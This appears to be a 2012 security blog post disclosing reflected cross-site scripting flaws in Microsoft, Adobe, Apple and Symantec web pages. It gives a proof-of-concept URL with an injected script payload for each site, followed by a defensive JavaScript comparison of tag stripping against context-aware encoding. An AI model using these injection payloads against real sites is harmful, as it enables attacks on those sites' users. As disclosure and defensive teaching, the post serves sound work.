
17 March 2012

Cross-site scripting vulnerabilities in Microsoft, Adobe, Apple and Symantec web sites

Cross-site scripting vulnerability in microsoft.com





Bad fix from Microsoft: the page was XSSed for the first time on 07.03.2012 (mirror) and is still vulnerable today...

PoC:

http://www.microsoft.com/en-us/together/possibilities.aspx?a='"--></style><script>confirm(/BAD FIX!/.source);/&b=*/</script>

Cross-site scripting vulnerability in adobe.com




PoC:


https://www.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type="><img src=x: onerror=alert(String.fromCharCode(74,117,115,116,32,97,32,88,83,83,46,46,46))>&code=blackletter&cat=style

Cross-site scripting vulnerability in support.apple.com




PoC:


http://support.apple.com/kb/index?page=servicefaq&geo='-alert('xss')-'&product=ipad


Cross-site scripting vulnerability in symantec.com




PoC:


http://www.symantec.com/business/support/index?page=landing&key='-confirm('xss')-'&locale=en_us
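
Two of the four payloads above contain no angle brackets at all, which is why a fix that only filters tags does not hold. The following is an added example, not code from the original post or from any of the affected sites: it compares a tag-stripping filter with context-aware output encoding on the parameter values from the PoC URLs. It assumes the `geo` and `key` values are reflected into a single-quoted JavaScript string and the `type` value into a double-quoted HTML attribute (the payload shapes suggest this; the post does not say), and `stripAngleBrackets` is a hypothetical incomplete fix.

```javascript
// Added example. Values are copied from the PoC URLs on this page; the
// reflection contexts are assumptions inferred from the payload shapes.
const pocValues = {
  adobeType: `"><img src=x: onerror=alert(String.fromCharCode(74,117,115,116,32,97,32,88,83,83,46,46,46))>`,
  appleGeo: `'-alert('xss')-'`,
  symantecKey: `'-confirm('xss')-'`,
};

// Hypothetical incomplete fix: remove angle brackets and nothing else.
const stripAngleBrackets = (v) => v.replace(/[<>]/g, "");

// Encoder for a double-quoted HTML attribute value.
function escapeHtmlAttr(v) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return v.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Encoder for a quoted JS string in an inline <script>: unsafe chars become \uXXXX.
function escapeJsString(v) {
  return v.replace(/[^A-Za-z0-9 ,._]/g,
    (ch) => "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

// True if `body` would end a "..." attribute value early.
const endsAttribute = (body) => body.includes('"');

// True if `body` would end a '...' script string early.
function endsJsString(body) {
  if (/<\/script/i.test(body)) return true; // HTML parser closes the block first
  for (let i = 0; i < body.length; i++) {
    if (body[i] === "\\") {
      if (i === body.length - 1) return true; // would escape the closing quote
      i++; // skip the escaped character
    } else if ("'\n\r".includes(body[i])) {
      return true;
    }
  }
  return false;
}

// For each value: [breaks out after tag stripping, breaks out after encoding].
function report() {
  const { adobeType, appleGeo, symantecKey } = pocValues;
  return {
    adobe: [endsAttribute(stripAngleBrackets(adobeType)), endsAttribute(escapeHtmlAttr(adobeType))],
    apple: [endsJsString(stripAngleBrackets(appleGeo)), endsJsString(escapeJsString(appleGeo))],
    symantec: [endsJsString(stripAngleBrackets(symantecKey)), endsJsString(escapeJsString(symantecKey))],
  };
}
console.log(report());
```

The first element of each pair stays `true` because the quote character that ends the surrounding context survives tag stripping; only encoding chosen for the output context removes it.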